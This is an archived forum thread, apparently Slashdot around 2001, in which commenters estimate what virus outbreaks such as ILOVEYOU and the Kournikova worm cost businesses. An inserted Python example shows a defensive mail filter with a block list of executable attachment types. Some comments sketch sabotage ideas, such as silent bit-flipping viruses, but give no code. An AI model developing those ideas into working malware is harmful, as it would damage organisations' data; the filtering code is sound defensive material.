How Much Do Computer Virus Attacks Really Cost?

Posted by Cliff
from the let's-get-some-cost-analysis-on-that-17B-figure,-Bob! dept.
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
This discussion has been archived. No new comments can be posted.

  • by Anonymous Coward
    I provide tech support for about 20 clients. These include individual home office users, small non-networked offices, a 50-station NT network, and a 10-station W95 peer network. Neither of these networks has any significant firewalling beyond what NAT provides, and their virus scanners aren't updated very often. Maybe 200 computers altogether. In the course of a year, I see perhaps 3 infections, averaging a couple of computers per infection. Cost to remedy, maybe $500 altogether. Cost of preventative measures, maybe another $1000. I don't know about lost time, but the damage is rarely serious; most of the lost time is due to panic. At a guess, worker time lost at a couple of hours per computer affected (they may lose more time at the computer than that, but usually aren't just sitting there with their thumb up their nose). $20/hr*4hr*6 people=$480, +$500+$1000=$1980. $10/computer/year.
  • by Anonymous Coward
    Your costs will be zero if you use IBM OS/2 Warp. I have never had a virus in the last ten years. Rene
  • by Anonymous Coward
    I think this is an excellent example of a cost MANY people in /. are forgetting to calculate in to their figures. I have received a couple e-mails from my father warning me about possible virii he has sent out because they were delivered to his company. He had sent out this e-mail to myself as well as his clients and other business contacts. I don't know if it cost the company any money but the possibility still exists. Also, I'd like to point out that educating users is STILL a cost incurred by a virus. The benefit is, hopefully, users will better protect themselves and the cost the business incurs for the next virus that attacks them will be much less or nothing at all as their users were educated and better prepared to handle the situation themselves.
  • by Anonymous Coward
    Easy, they have a free online scanning service, and I am sure it is phoning home with statistics, etc. I would imagine that all of the antivirus software, and all of Microsoft's software has backdoors in it where they can gain information...
  • by The Man (684)
    It costs this, it costs that. So what? There's an easy solution: drop windows. Failing that, put a statement into your new hire/contractor terms of employment agreement to the effect that:

    It is company policy not to open electronic mail messages containing attachments, or to receive or transmit electronic messages of a non-work-related nature. It is agreed by all parties that violating this policy will result in immediate dismissal.
  • If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...

    Lord knows my morale plummeted this morning when I discovered that the hot nude pic of Anna Kournikova that somebody had emailed me was, in fact, just some lame Windows virus..

  • At my former employer, Microsoft Outbreak (tm) is NOT used for email, so they're not quite as vulnerable to virii as the typical workplace.

    We spent much more time dealing with Windows-related problems (with 80 users, wipe and reinstall Win9x on 2-3 machines per month) than we did with viruses. So I'd like to see a study on the labor costs of using Windows - it might dwarf the cost of virus infections.

  • What about the business that Symantec, McAfee, and whoever else is in the anti-virus business. How much did they pull in for their software? I think that would be much more interesting
  • how much you would give me for my sanity.
    the first thing that goes when the next big virus hits my company is my sanity.
    this is because multiple messages are sent to all saying

    "the message with as a subject line is a virus, don't open it. get your virus update here"

    and then you see 10 messages right after it with the aforementioned subject.

    I don't know why these people have an email account anyway, they can't f*cking read.

    I hate monday.

    Here you have, ;o)

    damnit.
  • Or, a clue-by-four.
    "We have the right to believe at our own risk any hypothesis that is live enough to tempt our will."

  • Viruses cost people time - time that they could be working on something else, like "real work", not maintenance.

    Correct me if I'm wrong, but isn't the "real work" of a sysadmin exactly that - maintenance?

    --
  • Remember your monthly maintenance on your Windows box, reinstall it monthly....most people don't....so they are saving money by NOT...viruses are a method to force users into submission of reinstalling Windows.
  • It doesn't cost my company [spinweb.net] anything because we don't use Windows. Simple. Problem solved.
  • Amusingly enough this is a '4x2' in the UK. (Pronounced "Four be two" if you want to be taken seriously)
  • Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".



    Just a thought here. But doesn't it seem odd that every 6 months to a year there is a really big email style virus that hits a large majority of the "not so bright" people out there?

    Now most of these viruses don't do a lot of damage like the good old viruses that ate the hd as fast as possible. But from what I've seen there is one cost I haven't seen mentioned yet...the virus checker. Ok they aren't terribly expensive, but most people who get these viruses and lack an IT Dept go buy the latest virus checker to fix the problem. Seems like the companies that make virus checkers are quite happy whenever there is a big virus that gets into all the "dense" peoples computers.

    Which brings me to the thought of "what if the virus checker companies made and distributed the virus?". Good for sales, keeps them in business, and keeps the fear alive. But since I don't know anyone working for any of these companies I couldn't give any proof. But it still seems suspicious.
  • by Anonymous Coward
  • by Danse (1026)

    I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

    But those things are not legitimately attributable to viruses. Those are attributable to hiring idiots for admins.

    The rest of your post I agree with.

  • Fah, I have a whole pile of systems that were deemed to be not Y2K compliant. Of all of them one required that the clock be reset, but only under Windows, it runs Linux just fine.

    The rest of the world spent far less on their computer systems, and yet their lights stayed on. Y2K was a myth, for all intents and purposes. But it got rid of a lot of cruft, and it made a bunch of hardware and software companies very wealthy, so it wasn't all bad.

  • The chances of such a worm propagating are essentially nil. The trick worked in this one particular case because you happened to know exactly the software that your friend would be using. If your Applescript were sent to a Mac user that used some other email client it would have simply crashed. There simply aren't enough Mac Eudora users to sustain such a beast.

    You tricked one guy (who you happened to know), but how many of the messages in his inbox were from Eudora using Mac addicts? And of those few who actually use the right type of software how many of them would open up any random jpeg from your buddy without poking at it a little first?

    Microsoft is certainly responsible for creating software with such disregard for security. But it isn't the fact that all of the other email clients in the world are so much more secure that keeps their users from becoming targets, it is the fact that Windows + Outlook has the largest install base. There are scads of gullible Windows users, and there is a good chance that most of the addresses in a typical Windows User's address book are running the same sort of software.

  • There is still lost time. For example, the system administrators probably had something else they needed to be doing. In most of the organizations I have worked for the sysadmins don't just sit around all day playing quake and waiting for a fire. The lost time simply applies to all of the things that the sysadmin could have accomplished if he hadn't been cleaning up viruses. If your systems administrators are only busy when you have a virus, eliminating viruses would allow you to cut back on the amount of systems administrators that you hire.

    Also, there is the fact that when a virus epidemic hits there are generally more than one system affected. Email servers are shut off, multiple workstations re-formatted and re-seeded. The largest expense of nearly any business is its payroll (in the US anyway). If a part of a company's workforce is unable to work at peak capacity it is squandering its most costly resource. Viruses often affect entire departments, and can cost real money to a business.

  • The same virus could be written in ECMAScript, aka Javascript, aka JScript.
  • "When you get right down to it, it's really Intel's fault. Their CPUs will run any code, without giving any thought to security... "

    Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...

    sPh
  • "I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.
    Therefore things like software piracy, virus attacks, are not losses."

    That's funny. My coworker and I, who are 100% scheduled from now through April 30th on an ERP implementation for a small manufacturing company, have spent the last three hours (and appear to have about 3 more to go, or a total of 12 manhours) working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny (and yes, I know the users shouldn't have clicked on that). Now, that's 12 manhours down the drain. Plus, when I arrive at the manufacturing site tomorrow, I won't be prepared for the work I was going to do, and another 8 hours or so of everyone's time will be wasted as we try to work through that unpreparedness.

    Now, exactly how is that NOT a cost?

    sPh
  • It's ironic that this story should appear on Slashdot just as Yet Another Visual Basic Virus spreads through the address books of everyone who uses that digital Petri dish of an e-mail program called Microsoft Outlook (or, based on the number of virii it spreads, perhaps it should be called Microsoft Outbreak instead).

    The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!
    --
  • We're an MS Enterprise licensing customer - for our licensing fee (which isn't bad), we get the rights to any version of desktop Windows, any version of Office up to Professional, and all server/BackOffice CALs we need.

    Outlook and Exchange come with the territory - it'd be tougher for us to substitute a different mail system than the payback would justify.

    Personally, I'd prefer a nice IMAP-based system that is less vulnerable to begin with, but if you manage the system carefully you can make the MS stuff work acceptably well - which is nice when you work at a company that's drank the Microsoft-branded Kool-Aid.

    - -Josh Turiel
  • In 1998, a few months after I took the sysadmin job at my company, we had an infestation of the Class macro virus. It was a pain to clean up and deal with, but my staff and I took care of it in about a day - no data was lost.

    After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like .SHS and .VBS files. We have not had an infection of any sort since then - the antivirus portion of the gateway is updated with every update released (engines and definitions), and the clients are updated through management software that updates automatically as well - and the clients are locked into the most paranoid settings available.

    The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the foreseeable future, I'm happy with what I can do to prevent these from affecting us.

    So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".

    - -Josh Turiel
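
The attachment-blocking policy described in the comment above, as an added example (not the commenter's gateway and not any product's code). Only `.shs` and `.vbs` come from the comment; the rest of the blocklist, the function names and the sample messages are assumptions constructed for illustration.

```python
"""Gateway-style attachment filter: reject mail carrying executable file types."""
import email
from email import policy
from email.message import EmailMessage
from email.utils import collapse_rfc2231_value

# .shs and .vbs come from the comment above; the other extensions are an
# assumed blocklist of Windows-runnable types, added for illustration.
BLOCKED_EXTENSIONS = frozenset({
    ".vbs", ".vbe", ".shs", ".exe", ".com", ".scr", ".pif", ".bat",
    ".cmd", ".js", ".jse", ".wsf", ".wsh", ".hta", ".lnk",
})


def effective_extension(filename):
    """Return the lower-cased extension the desktop would act on.

    Only the last suffix counts, so "photo.jpg.vbs" is a script, not an
    image. Trailing dots and spaces are dropped first because Windows
    ignores them when it resolves the file type.
    """
    name = filename.strip().rstrip(". ").lower()
    dot = name.rfind(".")
    return name[dot:] if dot != -1 else ""


def blocked_attachments(raw_message):
    """Return the sorted attachment names in raw_message that must be blocked."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = set()
    # walk() also descends into forwarded message/rfc822 parts.
    for part in msg.walk():
        # Content-Disposition "filename" and Content-Type "name" can differ;
        # a mail client may honour either, so both are checked.
        candidates = (part.get_filename(), part.get_param("name"))
        for value in candidates:
            if value is None:
                continue
            name = collapse_rfc2231_value(value)
            if effective_extension(name) in BLOCKED_EXTENSIONS:
                hits.add(name)
    return sorted(hits)


def gateway_verdict(raw_message):
    """Return ("reject", names) if any part is blocked, else ("accept", [])."""
    names = blocked_attachments(raw_message)
    return ("reject", names) if names else ("accept", [])


def build_sample(filename, forwarded=False):
    """Build a constructed test message with one harmless attachment."""
    inner = EmailMessage()
    inner["From"] = "sender@example.com"
    inner["To"] = "user@example.com"
    inner["Subject"] = "constructed sample"
    inner.set_content("See attachment.")
    # Placeholder bytes only; the filter decides on the name, not the content.
    inner.add_attachment(b"placeholder payload", maintype="application",
                         subtype="octet-stream", filename=filename)
    if not forwarded:
        return bytes(inner)
    outer = EmailMessage()
    outer["From"] = "user@example.com"
    outer["To"] = "colleague@example.com"
    outer["Subject"] = "Fwd: constructed sample"
    outer.set_content("Forwarding this.")
    outer.add_attachment(inner)  # becomes a message/rfc822 part
    return bytes(outer)


if __name__ == "__main__":
    for fname in ("report.pdf", "AnnaKournikova.jpg.vbs", "notes.SHS."):
        print(fname, "->", gateway_verdict(build_sample(fname)))
    print("forwarded ->", gateway_verdict(build_sample("card.shs", forwarded=True)))
```

A name-based filter like this says nothing about content, so it complements the antivirus scanning mentioned in the same comment and does not replace it.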
  • In the U.S. a "two by four" (when not referring to some sort of seating or driven wheels arrangement on a truck), is a piece of lumber, the rectangular cross-section of which measures 1 and 1/2 (one and one-half) (1.5) inches by 3 and 1/2 (three and one-half) (3.5) inches.

    Commercially available lengths usually start at 8 feet (96 inches) going up in length in multiples of 2 feet (24 inches).

    A "stud" is usually 93 inches in length, which means that nailing them at right angles to a 1.5 inch thick bottom, or sole, plate and a 1.5 inch thick top plate results in an 8 foot wall. (In construction the question of when to say "foot" and when to say "feet" is answered "it depends")

    If you remodel a house built in the early 1950's you'll find that the "2x4's" used back then are slightly wider and thicker (by either an eighth or a sixteenth of an inch, don't feel like going out in the rain to the shop to the woodbin with a tape measure just now) and the studs are shorter by double the thickness increase so that the wall is still 96 inches high.

    Extrapolating back there was probably a time when 2x4's were 2 inches by 4 inches wide and thick (or thick and wide).

    In the context of the original post, a 2x4 is a board that you can wrap your hands around and use to beat someone with or threaten to do so.

  • The difference is that the virus is more reliable, works with a wider range of hardware, requires fewer resources, and the author probably won't sue you for reverse engineering it if you can't find the source code.
  • The reason it is a boneheaded over-reaction as a response is that .vbs viruses are easily readable, and the exact nature and extent of their damage and the locations they are placed easily determined. VBS viruses are no more mysterious than a .sh 'virus' would be. Once you remove the responsible files and registry entries, there's no problem.
  • This is true, but completely tangential to what we were talking about: none of the things you describe are remediated by the measure of rebuilding a bunch of desktop machines out of the belief that "unknown" damage can't be repaired by more straightforward mechanisms. All the things you describe are true, but if they happened they would be made obvious by looking at the payload.
  • That's funny. My coworker and I, ... have spent the last three hours ... working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny. ... Now, that's 12 manhours down the drain.
    ...
    Now, exactly how is that NOT a cost?
    Think of it as an extension of the Microsoft tax, or, alternatively, a tax on stupidity.

    --

  • True. Fortunately, we're practically immune to VB scripts, since we block them at as many places as is feasible. Sadly, we can't really stop the flow of Word documents, but we disable macros, and so on.

    "Real" viruses may have better luck getting in, but we're generally up to date with the updates.

    As for Ghost, we'd use it (in fact, I've been pushing for it), but to get it done legit is expensive. Not a problem to me, but I don't always get the gear/utilities that I want because of price. Oh well.


    Raptor
  • It's been said by others, and *yes* I know that this barely *cough*Redhat*cough* affects Linux users, but how many corporations use Linux for all their employees?
    Under Windows, you do the following:
    a) Install Norton on every machine
    b) Pay for LiveUpdate
    c) Set tight-fisted policy, so that anyone who breaks it realizes that it's their fault, and they *may* get bumped to the bottom of the queue
    d) Use a mail server capable of decent filtering (procmail is excellent for this, and your unix box can relay to Exchange if you *really* need it)
    e) Network profiles and user directories, with a solid backup rotation.

    Of course, everyone here knew that, right?

    I've dealt with this before. We've fixed it in a matter of minutes due to good policy, an extra box lying around, and a tight-fisted reign over the network.

    Raptor
  • Most of our machines run Linux so those are automatically virus free. We also use MacOS and Windows which we keep updated with the latest virus scanners. Given that these updates are available for free online and can be automated the cost isn't much. Due to some problems with our old software working under Windows 2000 we've had to switch to Outlook for mail and I feel that may increase our problems but so far it's been nothing big. I'm considering setting up virus scanning at the mail server level (runs Linux) to take care of that problem but that takes very little effort. I'd say viruses cost maybe $100 in upkeep and monitoring a year.
  • We don't really have an accurate measure here. I know what the Love Bug cost ME, since I got to go and clean the little fucker off the dozen or so morons' desks that opened it. During that whole time I got to listen to them bitch about how they had nothing to do. They weren't even able to catch the hint that they caused it themselves. Finally, we just told them that we could not have it fixed the same day, and told them to go home. After that we were able to finish the job quickly and easily.

    From a pure production stand-point, we lost some $$ since we shut down the mail-server until we fixed it, but still, who knows? We lost a day's worth of work for 12 people doing various production-related things, most of a day of my projects which have a direct impact on the entire company rather than a single dept., and we had no email for 6-8 hours which threw a kink into everyone's communications. Hard to measure.

    I did get some payback that day. Since we run an email-to-fax gateway, the 3-4 people who had a Contacts list full of fax addresses got to deal with a shit load of calls from irritated correspondents who were getting 10+ page faxes full of I Love You's code.

    --
  • To rephrase Marilyn's Sugardaddy:
    Ask not what viruses do cost; ask rather how much they could cost.
    Face it: most viruses (so far as we know) are little more than nuisances. Yes, they cost money because they waste a lot of people's time and bandwidth, but that's about it.

    But what happens when people start writing more insidious viruses?

    Say: flip a random bit in a random data file. Those bits add up over a few years, and even if you had two years' accumulated daily backup tapes, it would be nigh impossible to rebuild clean data from them. So what happens when you go to work one day, start troubleshooting a problem, and suddenly discover that you can't trust any of the data on any of your company's computers? And can't even confidently demonstrate which files are corrupt and which aren't?

    Or: suppose someone uses a virus to cover a more sinister attack? The bank's IT staff congratulate themselves at how quickly they squashed a viral attack, not realizing that one of those messages had the same subject line and same .vbs name, but carried an altogether different payload.

    Other scenarios should be easy to come up with as well. The surprise is that the virus writers haven't come up with them yet. (Or haven't they?)

    My point is: yes, headlines probably use grossly inflated figures for the cost of virus attacks, and yes, most of them could be shrugged off as annoying pranks. But will it always be that way? Rather than playing down the seriousness of viruses by pointing out cases of obvious or probable exaggeration, we should be trying to scare the bejesus out of our clients and employers, before "the big one" comes along.

    --
  • > What's interesting is how it decodes itself from the string.

    I saw something recently about how the anti-virus companies are starting to whinge about how the number of different compression schemes available out there makes it really hard to create signatures for all the viruses. Same virus, different compression ==> different signature required.

    --

  • While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?

    These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.

  • A US "2x4" is a length of softwood building material nominally 2" by 4" in cross-section before planing, actually about 1-3/8" X 3-1/8" (3.5 cm X 6.25 cm approx.) after finishing.

    A 2x4 is also at times known as a "clue stick."
  • No need to annoy the users to update their virus definition files... Norton AntiVirus will do that for you! I imagine McAfee, etc. can do this also.

    And you can set up scheduled virus-scans in your Windows clients, make this part of the standard load image. My notebook Win2K client does it now.

    However, the general vulnerability of MS Windows software to viruses is a _great_ motivator for a company to look into using Linux on the desktops.

    Give me an ever-better Wine to run MS Office apps, plus a Linux version of Lotus Notes, and SecureID SSL encryption ported to Linux, I won't use Win2K!

  • .. is to require the responsible parties to pay for them. By "responsible parties", I'm really referring to two groups of people. First and foremost are, of course, the authors and/or originators of the virus. Certainly, when they unleash a destructive virus on the computing community, they are culpable for much of the damage that is caused. The second group is one that doesn't get discussed a whole lot .. the users who spread the virus. Clearly, the brunt of the blame lies with the virus authors, but surely those "promiscuous" users who allow the virus to spread are partially at fault as well.

    This country (and, in many ways, the entire Western world) has been transformed into a place where there is no such thing as personal responsibility anymore. If you spill a cup of hot coffee on yourself, it's not your fault .. it's the fault of the person that served it to you. If you're daydreaming while walking and trip over a crack in somebody's sidewalk, it's not your fault .. it's the fault of the homeowner. And if you stupidly open an overtly suspicious attachment and unleash Dante's lowest level of Hell on your corporate intranet, it's not your fault, it's the script kiddie that wrote the virus!

    I hereby call "bullshit" on this. People need to be taught a basic modicum of computer security common sense. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued? I'll tell you what: a moron who blindly clicks on and opens every single attachment they get will think twice about it if they have to put a couple of months' worth of mortgage payments on their credit cards because half of their paycheck went to paying the tech support guys to clean up the mess they created.

    Viruses can be thwarted so that their effect is minimal, but this is not going to happen so long as user stupidity is coddled and encouraged and users who do stupid things are allowed to claim that it's "not their fault." It's not their fault that the virus was created, of course, but it is their fault that they did a very stupid thing that cost a lot of people a lot of money. If you start making people pay for their mistakes, you'll find that they wind up making a hell of a lot less mistakes.
  • But surreptitiously releasing a modified copy of "I Love You", we were able to determine with a high degree of accuracy which of our resources were, in fact, complete and total dipshits. After sending out a company wide email with the subject "WARNING: I Love You! DO NOT OPEN! VIRUS INSIDE!", many, many employees (mostly from legal and marketing) were immediately identified as being dipshits. We cut the fat, as it were, and are now a leaner, smarter organization better able to meet the challenges of the 21st century, sans dipshits.

  • The largest costs in the companies that I've seen are: software and meetings.

    Software licensing costs for anti-virus software are huge for a medium-to-large business. Also, the time spent in "what do we, as a company do about virii" is non-trivial.

    In the ideal company, anti-xxxx tactics (where xxxx is any sort of intrusion, theft, vandalism, etc) would be left to the people who do the job, but this is rarely the case.
  • Yeah, a couple of my friends here at work went to NDSU... Being as they have EE degrees, they probably saw a computer or two while they were there, though I don't think I could move that far north - leaving the tropics here (Rochester, MN) would be a harsh shock ;-)

    Now about 'dem hossless carriges... 8^)
    --
  • The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency. This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
    I would argue the inverse - if a person was able to carry on their "regular" work AND handle the virus incident, you would have an argument for no real cost. But we know that tends not to happen.

    Time is a finite resource that is closely linked to productivity. Productivity is linked to the completion of projects. When one's time is taken up by unscheduled workload (ie: the virus incident), current projects tend to suffer. That means the project either slips or more time has to be thrown at it. Where do you get that time? You hire more people to work the project, increasing the available manhours (time) and increasing the cost.

    Whether these virus scares SHOULD cause such an impact on an organization's available time is an entirely different matter.

  • The announcement went out that no one should use email, I walked around a little bit later looking for my manager (he had asked me to look at the code to the script, find out what it does - not much anymore, other than waste resources, it turns out) - the office was near empty: Everyone went to lunch!

    If that isn't lost money, I don't know what is!

    We use Windows (unfortunately) for a lot of our stuff, and most everybody uses Outlook - I use Netscape, and I consequently DON'T HAVE A PROBLEM (Netscape doesn't know what to do with the attachments). Also, I uninstalled Windows Scripting, so that nips it as well.

    I have tried repeatedly to get the IS dept or anyone who would listen to switch to something else, filter VBS scripts at the server - something: All to no avail, so far...

    Worldcom [worldcom.com] - Generation Duh!
  • >http://mast.mcafee.com/mast/mass_map.asp

    The frightening thing to me - how the hell does McAfee get the data that makes up the map?

    If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.

    Sounds like a privacy/security nightmare.

  • So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?

    What's boneheaded about it? Can you think of a way requiring LESS down time to make SURE that the virus and anything it corrupted is removed from ANY computer at the company?

    Starting a virus is like starting a fire - in this case one that burns through all the computers that are susceptible. After the fire is out the firemen are going to water the ashes and dig them up to make SURE it's out, and build firebreaks to keep it from relighting from the surrounding area (which may still be burning).
  • You're assuming that $1 in the future is worth $1 today. In reality, the farther into the future you look, the less a dollar then is worth today.

    No, I'm not. I explicitly took that into account with the "bank account" analogy for the time-difference in value of the money.

    The cost in current dollars is the amount you have to put into the interest bearing account, in order to have the money to cover the shortfalls at the time they occur. Future withdrawals are a greater number of dollars than the initial deposit.
  • We had one person get infected with the I Love You virus before we were aware of it and notified people not to open blah blah blah. It took a sysadmin 10 minutes to disinfect the affected computer.

    Sysadmin salary/120,000 minutes worked per year*10 minutes= $4.16

    That's our total loss. If you decide to count the amount of time spent learning about viruses, that means you count the amount of time we spend with Bugtraq every morning, which we would do anyway, so that's a wash.

    Yeah, $4.16. That's about right.
  • Whenever I submitted a project to get funding based on 'productivity gains', they tell me that that 'productivity is an "intangible cost"', and therefore it cannot be used.

    If that's so, then lost productivity because of a 'down system' also is 'intangible', and therefore has no effect on 'cost'.

    Hey, it's THEIR rules...
  • Actually, believe it or not, Symantec still does not have an update to detect this worm while most of their competitors have had protection since last August. Once again, Symantec is last. Our company killed incoming email several hours ago awaiting an update from Symantec.
  • This one is a harmless worm. Polite even. It even sets a registry flag so it won't run more than once.

    Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.

  • If you have to run Outlook, put Outlook in the restricted zone. Set restricted zone to turn off ActiveX, JavaScript, Java, etc.... Don't open attachments that look fishy. I've done these two things and have never gotten a virus (except for once when some other idiot ran an attachment which infected files on network server, and I got the file, but my virus checker caught that and cleaned it up).
    ---
  • The people who care for the systems come and do a reinstall at $60 to $120 an hour. What's a typical system load for Windows? (It was a solid 8 hours for OS/2 back when I was doing onsite support.)
  • The Q Virus [theregister.co.uk]?

    Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.

  • Many of the figures used in showing how much money businesses use are really off base. For example, take "cyber slacking", the term often used for employees using the Internet at work for fun, not business. They do some survey where they learn the average person says they spend 30 minutes of their work day "cyber slacking". Then they say the average person gets paid $15/hour (or whatever) so that's $7.50 per worker per day. If there's 100 million workers, then business is losing $750 MILLION DOLLARS A DAY!!!! Dumb. Anyway... I hope that's not too off topic but sometimes that's how business thinks. Perhaps with the virus thing they figure out how much their tech people who fix the stuff are paid and then add up the hours spent fixing virus-ridden systems, etc... What they don't take into account is that those tech guys are probably on salary and if they weren't fixing the virus problem, they'd be doing something else.... Like cyber slacking. :)
  • Well, since it's been obfuscated, no it isn't very interesting ;-)

    Anyone de-obfuscated it?
  • The numbers I most often see go something along these lines: If a company sells $10 million a day, and it gets knocked offline for 6 hours they will say they lost $2.5 million. Of course this doesn't take into account shifting revenue to that time beyond the actual outage. This is more applicable to a DDOS attack, but companies seem to like to latch onto big numbers using simple math.

    The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.

    The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).

  • This just shows how anyone believes any numbers they read.

    Like all other forms of crime, computer viruses actually make money for countless people.
    From the products and salaries of virus companies, to cops salaries, to the salaries of reporters and other media, crime is great for absolutely everyone but a tiny irrelevant minority.


  • I was on site visiting one of our customers in NY when the luv bug virus broke out. I was helping one of the top admins with our product when everyone rushed around shouting that the e-mail server was down. It was Thursday at 4 in the pm.


    After a quick survey of the mail server, it was found that it had run out of space. Why? Was it copies of luv bug? No. The director of the IT dept., just before jumping in his car and driving home, had sent an e-mail out to every single alias he could think of warning users to update their virus definitions with the ATTACHED Symantec updater. The damn thing was three megs. Because most users were on several different aliases, they all had it copied to their mail boxes as many as eight times. Deleting all those mails from each user's box was a very tedious and time-consuming process, let me tell you.

    This was perhaps the most brilliant protection against a virus infection I have ever witnessed.



    Seth
  • However, I don't think one can include the cost of the antivirus software in your estimate. Even if there were no CIH, Melissa, or Love Bug, we would still be running the software.

    But this doesn't follow. If there were no viruses at all, you wouldn't need to worry about them as a source of data problems, and you wouldn't need to spend the $24 per client for anti-virus software. What that means is that the threat of a virus alone is enough to force you to add costs, so there's a cost associated with viruses even for well run shops that don't actually get infected. It's not a direct cost, but it still exists.

    1. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued?

    Odd that you should mention this. I did determine which one of my users opened it first. And while I didn't go to the extreme that you said of taking money from his pocket... I did send out a company-wide email jokingly pointing the finger at him (I called him a dead man).

    A little public humiliation can go a long way. I will guarantee you that he'll think twice about opening attachments from now on.

  • Sure, I guess if you don't place any value on your manhood.. I'll take a hundred crappy script kiddie viri rather than touch anything adorned with a multi-colored piece of fruit
  • 1 quarter to call someone who cares for each infected system.

    According to the New McAfee Virus Map:

    Luvbug.vbs infected
    So, 10,000x$0.25 = $2500.00/day

    Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...
  • ARGH! Slashcode ate my less-than symbol...

    above should read less than 10,000 infected systems
  • I got one copy of the virus, and deleted it. Cost: one minute.

    I read one Slashdot article about viruses (this one), and am responding to it. Cost: two minutes.

    'Nuff said.

  • About 4 or 5 years ago I wouldn't have agreed. I've lost a couple of disks to viruses. You could get some pretty nasty viruses if you knew where to look. Since the late 90's, with the Word Virus, and then these vbs viruses, you're pretty safe, and you're more likely to come to more harm installing things like McAfee onto your windows computer (where do they get virus map data?).
  • Last year when ILOVEYOU hit I worked for #49 in the Fortune 100. In the aftermath, Management estimated we'd spent 2400 hours of employee time cleaning it up, not to mention our corporate email was down for 3 days.
  • Back of the envelope figures; most of my end users are PCB designers and charge a pretty hefty sum per hour worked.

    When a 'worm' or other VBS mayhem is rampant:

    $ 110 per billable hour (average)
    x 10 minutes per hour to wade through excess mail
    $ 11 dollars per end user per hour.
    x 15 end users
    $ 165 per hour
    + 30 bucks an hour for my services
    = 195 per hour.

    That's when there is an active .VBS worm running loose. These problems have seldom lasted longer than 2 hours - and that is due to the mail admins living on the West Coast and not being available as soon as the East Coast facilities are hit.

    Otherwise, I'd guestimate that I spend at the most 2 work hours per week on virus and work related issues - that's average. Some weeks more, some weeks less, some weeks none at all.

    Above figures are for a small part of a larger manufacturing concern.

  • So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?
  • I agree. An intelligent user who is familiar with precautions against virii will probably never be infected. Out of the 10+ years that I've been using MS OS's, I've only ever had a virus once. And that was long ago when a roommate of mine was bringing home disks from work and using them on my PC. If you take reasonable precautions, you will be safe.

    Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around its neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by our AV response team that morning!

    People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.
  • Well if software sits on a shelf and is not sold, it can become a write-off. The value of the write off is cost of production per unit.

    A virus has a cost associated with it. Cost of productivity. Can we write it off. Hmmm software bought to prevent it happening again, extra consultants brought into the firm to upgrade systems ....

    That's the way I see it.

    How the tax systems work I don't know but I would not be surprised if someone could claim it if there was enough proof and well documented claim.

    example:
    Traveling salesman that has full account of his time in a written ( hand ) log. He/She could put computer down time as a loss of sales and presentation for the amount of days the system was down, proratedly only for the days the computer would be used based on a historical documentation of the hand written log file.

    There was a great article in Forbes magazine about how to manage your records for the IRS. This included those people that were gamblers and other types of people that have to keep a written log.

    ONEPOINT
  • I've deleted a half-dozen virus-containing emails from my inbox within the last half hour -- which means there are at least 6 people in my company stupid enough to open a .VBS attachment!

    The original love letter virus cost millions in lost productivity, because it crashed thousands of (Exchange) mail servers. Also, I lose productivity every time I reboot, because I have to wait for Norton Virus scan to download new patterns and scan my hard drive. Also, on an older system, the virus scanner interacted with Netware to crash Windows every time it tried to boot up, which cost me several hours of lost work until the IT department finally relented and told me the password to disable the virus scan function!

